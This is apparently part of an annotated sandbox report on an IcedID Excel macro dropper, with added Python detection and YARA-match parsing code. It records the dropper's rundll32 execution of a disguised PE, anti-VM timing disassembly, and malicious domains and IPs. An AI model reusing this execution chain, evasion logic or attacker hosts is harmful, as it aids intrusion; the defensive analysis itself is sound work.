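# Constructed sample data mirroring the report (not real captured telemetry).
FAKE_PE_HEAD = b"MZ" + b"\0" * 0x3A + (0x40).to_bytes(4, "little") + b"PE\0\0" + b"\0" * 20
EXCEL = r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"
RUNDLL32 = r"C:\Windows\System32\rundll32.exe"
SAMPLE_PROCESSES = [
    ProcessEvent(EXCEL, RUNDLL32, r"rundll32 ..\ksjvoefv.skd,DllRegisterServer"),
    ProcessEvent(r"C:\Windows\explorer.exe", RUNDLL32, r"rundll32.exe shell32.dll,Control_RunDLL"),
]
SAMPLE_FILES = [
    FileEvent(EXCEL, r"C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\3003[1].gif", FAKE_PE_HEAD),
    FileEvent(EXCEL, r"C:\Users\user\ksjvoefv.skd", FAKE_PE_HEAD),
    FileEvent(EXCEL, r"C:\Users\user\AppData\Local\Temp\image1.png", b"\x89PNG\r\n\x1a\n" + b"\0" * 8),
]

if __name__ == "__main__":
    for finding in analyze(SAMPLE_PROCESSES, SAMPLE_FILES):
        print(finding)
```

The rundll32 rule deliberately keys on the module's extension rather than its name, since the dropper here chose an arbitrary name (ksjvoefv.skd, .skd1 ... .skd4) but still had to hand a loadable PE to rundll32; the file rule keys on content rather than extension for the same reason. The benign explorer.exe launch of shell32.dll in the sample data produces no finding.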

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\ksjvoefv.skd
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\ksjvoefv.skd3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX (26 occurrences)
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX (5 occurrences)

Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_003B1B94 3_2_003B1B94
Source: C:\Windows\System32\rundll32.exe Code function: 7_2_002B1B94 7_2_002B1B94
Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\System32\rundll32.exe RDTSC instruction interceptor: First address: 00000000003B1C52 second address: 00000000003B1C73 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [ebp-10h], eax 0x00000018 mov dword ptr [ebp-0Ch], ebx 0x0000001b mov dword ptr [ebp-08h], ecx 0x0000001e mov dword ptr [ebp-04h], edx 0x00000021 rdtsc
Source: C:\Windows\System32\rundll32.exe RDTSC instruction interceptor: First address: 00000000003B1C73 second address: 00000000003B1C88 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec ecx 0x0000000a sub eax, eax 0x0000000c dec eax 0x0000000d add edi, eax 0x0000000f call dword ptr [00002428h] 0x00000015 jmp 00007F8410A97298h 0x00000017 jmp dword ptr [000925C2h] 0x0000001d dec eax 0x0000001e sub esp, 28h 0x00000021 dec eax 0x00000022 lea ecx, dword ptr [esp+30h] 0x00000026 call dword ptr [00046D21h] 0x0000002c dec eax 0x0000002d mov dword ptr [esp+08h], ecx 0x00000031 dec eax 0x00000032 sub esp, 18h 0x00000035 dec eax 0x00000036 test ecx, ecx 0x00000038 je 00007F8410AD1F7Dh 0x0000003e dec esp 0x00000040 mov eax, dword ptr [00000030h] 0x00000047 xor eax, eax 0x00000049 dec eax 0x0000004a mov dword ptr [esp+08h], eax 0x0000004e dec ecx 0x0000004f mov edx, dword ptr [eax+000014A0h] 0x00000055 dec eax 0x00000056 mov dword ptr [esp+08h], edx 0x0000005a dec eax 0x0000005b test edx, edx 0x0000005d jne 00007F8410AB078Ch 0x00000063 mov eax, C00000BBh 0x00000068 mov dword ptr [esp], eax 0x0000006b jmp 00007F8410A97292h 0x0000006d jmp 00007F8410A97292h 0x0000006f dec eax 0x00000070 mov dword ptr [ecx], edx 0x00000072 dec eax 0x00000073 add esp, 18h 0x00000076 ret 0x00000077 test eax, eax 0x00000079 jns 00007F8410AB71FFh 0x0000007f call dword ptr [00046D5Bh] 0x00000085 dec esp 0x00000086 mov edx, ecx 0x00000088 mov eax, 00000043h
Source: C:\Windows\System32\rundll32.exe RDTSC instruction interceptor: First address: 00000000003B1C88 second address: 00000000003B1C95 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
Source: C:\Windows\System32\rundll32.exe RDTSC instruction interceptor: First address: 00000000003B1C95 second address: 00000000003B1C52 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a sub eax, ecx 0x0000000c dec esp 0x0000000d add esi, eax 0x0000000f dec ecx 0x00000010 sub edi, 01h 0x00000013 jne 00007F8410A97234h 0x00000015 call dword ptr [0000245Eh] 0x0000001b jmp 00007F8410A97298h 0x0000001d jmp dword ptr [000925C2h] 0x00000023 dec eax 0x00000024 sub esp, 28h 0x00000027 dec eax 0x00000028 lea ecx, dword ptr [esp+30h] 0x0000002c call dword ptr [00046D21h] 0x00000032 dec eax 0x00000033 mov dword ptr [esp+08h], ecx 0x00000037 dec eax 0x00000038 sub esp, 18h 0x0000003b dec eax 0x0000003c test ecx, ecx 0x0000003e je 00007F8410AD1F7Dh 0x00000044 dec esp 0x00000046 mov eax, dword ptr [00000030h] 0x0000004d xor eax, eax 0x0000004f dec eax 0x00000050 mov dword ptr [esp+08h], eax 0x00000054 dec ecx 0x00000055 mov edx, dword ptr [eax+000014A0h] 0x0000005b dec eax 0x0000005c mov dword ptr [esp+08h], edx 0x00000060 dec eax 0x00000061 test edx, edx 0x00000063 jne 00007F8410AB078Ch 0x00000069 mov eax, C00000BBh 0x0000006e mov dword ptr [esp], eax 0x00000071 jmp 00007F8410A97292h 0x00000073 jmp 00007F8410A97292h 0x00000075 dec eax 0x00000076 mov dword ptr [ecx], edx 0x00000078 dec eax 0x00000079 add esp, 18h 0x0000007c ret 0x0000007d test eax, eax 0x0000007f jns 00007F8410AB71FFh 0x00000085 call dword ptr [00046D5Bh] 0x0000008b dec esp 0x0000008c mov edx, ecx 0x0000008e mov eax, 00000043h
Source: C:\Windows\System32\rundll32.exe RDTSC instruction interceptor: First address: 00000000002B1C52 second address: 00000000002B1C73 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [ebp-10h], eax 0x00000018 mov dword ptr [ebp-0Ch], ebx 0x0000001b mov dword ptr [ebp-08h], ecx 0x0000001e mov dword ptr [ebp-04h], edx 0x00000021 rdtsc
Source: C:\Windows\System32\rundll32.exe RDTSC instruction interceptor: First address: 00000000002B1C73 second address: 00000000002B1C88 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec ecx 0x0000000a sub eax, eax 0x0000000c dec eax 0x0000000d add edi, eax 0x0000000f call dword ptr [00002428h] 0x00000015 jmp 00007F8410A97298h 0x00000017 jmp dword ptr [000925C2h] 0x0000001d dec eax 0x0000001e sub esp, 28h 0x00000021 dec eax 0x00000022 lea ecx, dword ptr [esp+30h] 0x00000026 call dword ptr [00046D21h] 0x0000002c dec eax 0x0000002d mov dword ptr [esp+08h], ecx 0x00000031 dec eax 0x00000032 sub esp, 18h 0x00000035 dec eax 0x00000036 test ecx, ecx 0x00000038 je 00007F8410AD1F7Dh 0x0000003e dec esp 0x00000040 mov eax, dword ptr [00000030h] 0x00000047 xor eax, eax 0x00000049 dec eax 0x0000004a mov dword ptr [esp+08h], eax 0x0000004e dec ecx 0x0000004f mov edx, dword ptr [eax+000014A0h] 0x00000055 dec eax 0x00000056 mov dword ptr [esp+08h], edx 0x0000005a dec eax 0x0000005b test edx, edx 0x0000005d jne 00007F8410AB078Ch 0x00000063 mov eax, C00000BBh 0x00000068 mov dword ptr [esp], eax 0x0000006b jmp 00007F8410A97292h 0x0000006d jmp 00007F8410A97292h 0x0000006f dec eax 0x00000070 mov dword ptr [ecx], edx 0x00000072 dec eax 0x00000073 add esp, 18h 0x00000076 ret 0x00000077 test eax, eax 0x00000079 jns 00007F8410AB71FFh 0x0000007f call dword ptr [00046D5Bh] 0x00000085 dec esp 0x00000086 mov edx, ecx 0x00000088 mov eax, 00000043h
Source: C:\Windows\System32\rundll32.exe RDTSC instruction interceptor: First address: 00000000002B1C88 second address: 00000000002B1C95 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
Source: C:\Windows\System32\rundll32.exe RDTSC instruction interceptor: First address: 00000000002B1C95 second address: 00000000002B1C52 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec eax 0x0000000a sub eax, ecx 0x0000000c dec esp 0x0000000d add esi, eax 0x0000000f dec ecx 0x00000010 sub edi, 01h 0x00000013 jne 00007F8410A97234h 0x00000015 call dword ptr [0000245Eh] 0x0000001b jmp 00007F8410A97298h 0x0000001d jmp dword ptr [000925C2h] 0x00000023 dec eax 0x00000024 sub esp, 28h 0x00000027 dec eax 0x00000028 lea ecx, dword ptr [esp+30h] 0x0000002c call dword ptr [00046D21h] 0x00000032 dec eax 0x00000033 mov dword ptr [esp+08h], ecx 0x00000037 dec eax 0x00000038 sub esp, 18h 0x0000003b dec eax 0x0000003c test ecx, ecx 0x0000003e je 00007F8410AD1F7Dh 0x00000044 dec esp 0x00000046 mov eax, dword ptr [00000030h] 0x0000004d xor eax, eax 0x0000004f dec eax 0x00000050 mov dword ptr [esp+08h], eax 0x00000054 dec ecx 0x00000055 mov edx, dword ptr [eax+000014A0h] 0x0000005b dec eax 0x0000005c mov dword ptr [esp+08h], edx 0x00000060 dec eax 0x00000061 test edx, edx 0x00000063 jne 00007F8410AB078Ch 0x00000069 mov eax, C00000BBh 0x0000006e mov dword ptr [esp], eax 0x00000071 jmp 00007F8410A97292h 0x00000073 jmp 00007F8410A97292h 0x00000075 dec eax 0x00000076 mov dword ptr [ecx], edx 0x00000078 dec eax 0x00000079 add esp, 18h 0x0000007c ret 0x0000007d test eax, eax 0x0000007f jns 00007F8410AB71FFh 0x00000085 call dword ptr [00046D5Bh] 0x0000008b dec esp 0x0000008c mov edx, ecx 0x0000008e mov eax, 00000043h
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_003B1B94 rdtsc 3_2_003B1B94
Contains functionality to query network adapter information
Source: C:\Windows\System32\rundll32.exe Code function: GetAdaptersInfo,GetAdaptersInfo, 3_2_003B1F94
Source: C:\Windows\System32\rundll32.exe Code function: GetAdaptersInfo,GetAdaptersInfo, 7_2_002B1F94
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\rundll32.exe Window / User API: threadDelayed 668
Found dropped PE file which has not been started or loaded
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\3003[1].gif
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\3003[1].gif
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\rundll32.exe Last function: Thread delayed (4 occurrences)
Source: C:\Windows\System32\rundll32.exe Thread delayed: delay time: 60000 (3 occurrences)
Source: rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp Binary or memory string: </figure> <h3 id="VMware_Cloud_on_AWS" class="lb-tiny-align-center lb-txt-none lb-txt-white lb-h3 lb-title"> VMware Cloud on AWS</h3>
Source: rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp Binary or memory string: <a style="padding-left:30px; padding-right:30px;" href="/vmware/?hp=tile&amp;tile=hybridsol" target="_blank" rel="noopener">
Source: rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp Binary or memory string: <img src="//d1.awsstatic.com/webteam/homepage/Hybrid%20Solutions/VMWareCloud_Icon.55cb0bcef2c74b55acdb7155e3524e4b5436ec6e.png" alt="VMWareCloud_Icon" title="VMWareCloud_Icon" class="cq-dd-image" />
Source: rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp Binary or memory string: Migrate and extend VMware environments to the AWS Cloud
Source: rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp Binary or memory string: <a href="/vmware/?hp=tile&amp;so-exp=below"> VMware Cloud on AWS<span>Build a hybrid cloud without custom hardware</span> </a>
Source: rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp Binary or memory string: <a style="padding-left:20px; padding-right:45px;" href="/vmware/?hp=tile&amp;tile=hybridsol" target="_blank" rel="noopener">
Source: rundll32.exe, 00000007.00000003.2174303678.00000000031C9000.00000004.00000001.sdmp Binary or memory string: <a href="/rds/vmware/?hp=tile&amp;so-exp=below"> Amazon RDS on VMware<span>Automate on-premises database management</span> </a>

Anti Debugging:

Contains functionality for execution timing, often used to detect debuggers
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_003B1B94 rdtsc 3_2_003B1B94

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\rundll32.exe Network Connect: 143.204.3.74 187
Source: C:\Windows\System32\rundll32.exe Domain query: tvorartificialnature.xyz
Source: C:\Windows\System32\rundll32.exe Domain query: aws.amazon.com
Source: C:\Windows\System32\rundll32.exe Domain query: usaaforced.fun
Source: rundll32.exe, 00000003.00000002.2499893181.0000000000700000.00000002.00000001.sdmp Binary or memory string: Program Manager
Source: rundll32.exe, 00000003.00000002.2499893181.0000000000700000.00000002.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: rundll32.exe, 00000003.00000002.2499893181.0000000000700000.00000002.00000001.sdmp Binary or memory string: !Progman
Source: C:\Windows\System32\rundll32.exe Code function: 3_2_003B1D48 LookupAccountNameW, 3_2_003B1D48

Stealing of Sensitive Information:

Yara detected IcedID
Source: Yara match File source: 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2340656783.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2347303586.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2353273837.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2346946398.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2324539894.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2324305529.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2313180906.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2353071481.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2312959484.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2294844286.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2347372775.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2307293375.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2324432561.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2312752671.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2300737619.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2359025585.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2288787523.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2300503265.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2358776145.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2359409712.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2353386032.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2359132350.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2318924371.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2306619325.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2306955212.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2300848573.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2318582057.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2318854529.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2289125454.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2307060040.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000002.2499534316.00000000000DD000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2353251472.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2313048515.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2318832417.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2294985377.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2289046679.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2324458781.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2347597509.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2295056636.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2294958860.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2289433187.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2341036692.00000000000DD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2301147013.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2340962857.0000000000152000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2864, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2316, type: MEMORY
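The list above is long but describes few artifacts: every dump-file match is in process index 3 (the report's own line "Source: rundll32.exe, 00000003.00000002.…" ties that index to rundll32.exe) and at one of two base addresses, 0xDD000 and 0x152000, captured repeatedly over the run. The following added example, not part of the report or of Joe Sandbox, parses a subset of these lines and groups them by process and region so a responder can see how many regions actually need to be pulled for config extraction. The field meanings in the .sdmp name are inferred from the values on this page (process index, a stage marker, a dump counter, base address, and a fifth field that looks like a Win32 page protection, 0x04 = PAGE_READWRITE); treat those decodings as assumptions.

```python
"""Summarise the "Yara detected IcedID" memory matches by process and region.

Added example, not part of the sandbox report. Field meanings in the .sdmp
filename are inferred from the values on this page and are assumptions:
<process index>.<stage>.<dump counter>.<base address>.<page protection?>.<unknown>.sdmp
"""
import re
from collections import defaultdict

# Subset of the Yara match lines copied from the report above.
REPORT_LINES = [
    "Source: Yara match File source: 00000003.00000003.2341336889.0000000000152000.00000004.00000001.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000003.00000003.2340656783.00000000000DD000.00000004.00000001.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000003.00000003.2347303586.0000000000152000.00000004.00000001.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000003.00000003.2353273837.00000000000DD000.00000004.00000001.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000003.00000003.2346946398.00000000000DD000.00000004.00000001.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000003.00000003.2324539894.0000000000152000.00000004.00000001.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000003.00000003.2324305529.00000000000DD000.00000004.00000001.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000003.00000003.2313180906.0000000000152000.00000004.00000001.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000003.00000003.2353071481.00000000000DD000.00000004.00000001.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000003.00000003.2312959484.0000000000152000.00000004.00000001.sdmp, type: MEMORY",
    "Source: Yara match File source: 00000003.00000002.2499534316.00000000000DD000.00000004.00000020.sdmp, type: MEMORY",
    "Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2864, type: MEMORY",
    "Source: Yara match File source: Process Memory Space: rundll32.exe PID: 2316, type: MEMORY",
]

DUMP_RE = re.compile(
    r"File source: (?P<proc>[0-9A-Fa-f]{8})\.(?P<stage>[0-9A-Fa-f]{8})\.(?P<dump>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})\.(?P<extra>[0-9A-Fa-f]{8})\.sdmp"
)
PID_RE = re.compile(r"Process Memory Space: (?P<image>\S+) PID: (?P<pid>\d+)")

# Win32 memory protection constants; that the fifth field is one is an assumption.
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
}


def parse_match(line):
    """Describe one Yara match line as a dict, or return None if it is neither form."""
    m = DUMP_RE.search(line)
    if m:
        return {
            "kind": "dump",
            "process_index": int(m["proc"], 16),
            "stage": int(m["stage"], 16),
            "dump_id": int(m["dump"]),
            "base": int(m["base"], 16),
            "protection": int(m["prot"], 16),
        }
    m = PID_RE.search(line)
    if m:
        return {"kind": "process", "image": m["image"], "pid": int(m["pid"])}
    return None


def summarize(lines):
    """Group dump matches by (process index, base address) and map PIDs to images."""
    regions = defaultdict(list)
    pids = {}
    for line in lines:
        rec = parse_match(line)
        if rec is None:
            continue
        if rec["kind"] == "dump":
            regions[(rec["process_index"], rec["base"])].append(rec)
        else:
            pids[rec["pid"]] = rec["image"]
    summary = {}
    for key, recs in regions.items():
        recs.sort(key=lambda r: r["dump_id"])
        summary[key] = {
            "matches": len(recs),
            "first_dump": recs[0]["dump_id"],
            "last_dump": recs[-1]["dump_id"],
            "protections": sorted({PAGE_PROTECTION.get(r["protection"], hex(r["protection"]))
                                   for r in recs}),
        }
    return summary, pids


if __name__ == "__main__":
    summary, pids = summarize(REPORT_LINES)
    for (proc, base), info in sorted(summary.items()):
        print(f"process {proc} region {base:#x}: {info['matches']} matches, "
              f"dumps {info['first_dump']}..{info['last_dump']}, {', '.join(info['protections'])}")
    print("process memory spaces:", pids)
```

On the subset embedded above this yields two regions in process 3, 0xDD000 (6 matches) and 0x152000 (5 matches), both with the 0x04 protection value, plus the two rundll32.exe PIDs; run over the full list the counts rise to 23 and 22 but the set of regions does not change. Repeated matches on the same writable, non-image region across successive dumps are what you would expect from an unpacked payload or its configuration resident in heap memory, so those two regions are the ones to carve for the C2 list the report's "Found malware configuration" signature refers to.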

Remote Access Functionality:

Yara detected IcedID
Source: Yara match (the same 45 memory dumps of process 3 and the two rundll32.exe process memory spaces, PIDs 2864 and 2316, listed under Stealing of Sensitive Information above)
Behavior Graph (ID 382870; sample document-1251000362.xlsm; start date 06/04/2021; architecture WINDOWS; score 100)

Sample (root node)
  DNS/IP: tvorartificialnature.xyz
  Signatures: Found malware configuration; Multi AV Scanner detection for submitted file; Document exploit detected (drops PE files); 9 other signatures
  Started: EXCEL.EXE (node counters 87 and 53: created registry values and created files, in the legend's order)

EXCEL.EXE
  DNS/IP: agenbolatermurah.com; partsapp.com.br (192.185.214.87, port 443, local port 49170, UNIFIEDLAYER-AS-1US, United States); 3 other IPs or domains
  Dropped: C:\Users\user\ksjvoefv.skd3 (PE32+); C:\Users\user\ksjvoefv.skd (PE32+); C:\Users\user\AppData\Local\...\3003[1].gif (PE32+); 2 other malicious files
  Signatures: Document exploit detected (UrlDownloadToFile)
  Started: rundll32.exe (node 12); rundll32.exe (node 16); rundll32.exe (node 18); 2 other processes
  agenbolatermurah.com: Outdated Microsoft Office dropper detected

rundll32.exe (node 12)
  DNS/IP: usaaforced.fun; tvorartificialnature.xyz; 4 other IPs or domains
  Signatures: System process connects to network (likely due to code injection or exploit); Performs DNS queries to domains with low reputation; Contains functionality to detect hardware virtualization (CPUID execution measurement); Tries to detect virtualization through RDTSC time measurements
  usaaforced.fun: Outdated Microsoft Office dropper detected

rundll32.exe (node 16)
  DNS/IP: tvorartificialnature.xyz; tp.8e49140c2-frontier.amazon.com; aws.amazon.com

Contacted Public IPs

IP              Domain                        Country        ASN     ASN Name                  Malicious
50.87.146.86    columbia.aula-web.net         United States  46606   UNIFIEDLAYER-AS-1US       false
199.79.62.99    tajushariya.com               United States  394695  PUBLIC-DOMAIN-REGISTRYUS  false
192.185.214.87  partsapp.com.br               United States  46606   UNIFIEDLAYER-AS-1US       false
143.204.3.74    dr49lng3n1n2s.cloudfront.net  United States  16509   AMAZON-02US               false
192.185.48.186  metaflip.io                   United States  46606   UNIFIEDLAYER-AS-1US       false

Private IP: 192.168.2.255

Contacted Domains

Name                          IP              Active
metaflip.io                   192.185.48.186  true
tajushariya.com               199.79.62.99    true
columbia.aula-web.net         50.87.146.86    true
dr49lng3n1n2s.cloudfront.net  143.204.3.74    true
partsapp.com.br               192.185.214.87  true
agenbolatermurah.com          unknown         unknown
usaaforced.fun                unknown         unknown
tvorartificialnature.xyz      unknown         unknown
aws.amazon.com                unknown         unknown